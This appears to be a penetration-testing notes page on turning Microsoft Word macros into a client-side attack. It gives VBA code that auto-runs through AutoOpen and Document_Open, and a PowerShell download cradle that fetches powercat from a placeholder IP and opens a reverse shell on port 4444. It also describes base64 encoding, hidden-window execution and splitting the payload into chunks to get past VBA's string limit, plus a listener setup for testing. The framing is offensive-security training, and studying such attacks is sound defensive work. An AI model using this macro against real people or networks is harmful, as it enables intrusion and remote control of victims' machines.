Exploiting Microsoft Office

Leveraging Microsoft Word Macros for Reverse Shells

Overview

Microsoft Word macros, written in Visual Basic for Applications (VBA), can automate tasks and serve as a powerful client-side attack vector when maliciously crafted. This guide outlines the creation of a macro to launch a reverse shell using PowerShell.

Key Points

1. Macro Basics

  • What are Macros?

    • Macros are written in VBA, offering full access to ActiveX objects and the Windows Script Host.

    • .doc or .docm formats are required to embed macros. Macros in .docx are not persistent.

2. Macro Setup

Steps:

  1. Save a Word document as .doc.

  2. Access the macro menu via View > Macros > Create.

  3. Develop the macro in the Visual Basic for Applications editor.

Default Macro Skeleton:

Sub MyMacro()
'
' MyMacro Macro
'
End Sub

3. Executing Commands with ActiveX

Example Macro to Open PowerShell:

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

4. Auto-Execution

Use AutoOpen and Document_Open to ensure macros execute when the document opens:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

5. Creating a Reverse Shell

PowerShell Download Cradle:

IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p 4444 -e powershell

  • Base64-encode the command to avoid issues with special characters.

6. Embedding Encoded Commands

Split the base64-encoded string into chunks to bypass VBA's 255-character limit:

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND_PART1"
    Str = Str + "BASE64_ENCODED_COMMAND_PART2"
    ...
    CreateObject("Wscript.Shell").Run Str
End Sub

7. Testing

  1. Start a Python web server to host powercat.ps1.

  2. Use a Netcat listener to catch the reverse shell.

  3. Open the Word document and enable macros.

Summary

  • Objective: Exploit Word macros for initial footholds in enterprise networks.

  • Outcome: A reverse shell is achieved using a malicious macro that downloads and executes PowerCat via PowerShell.

  • Challenges:

    • Victim must enable macros.

    • Increased awareness and security controls make delivery harder.

Macros remain effective but increasingly challenging to deliver, necessitating alternative or supplementary attack vectors.

PreviousWindows Library FilesNextThick Client Pentest

Last updated

Was this helpful?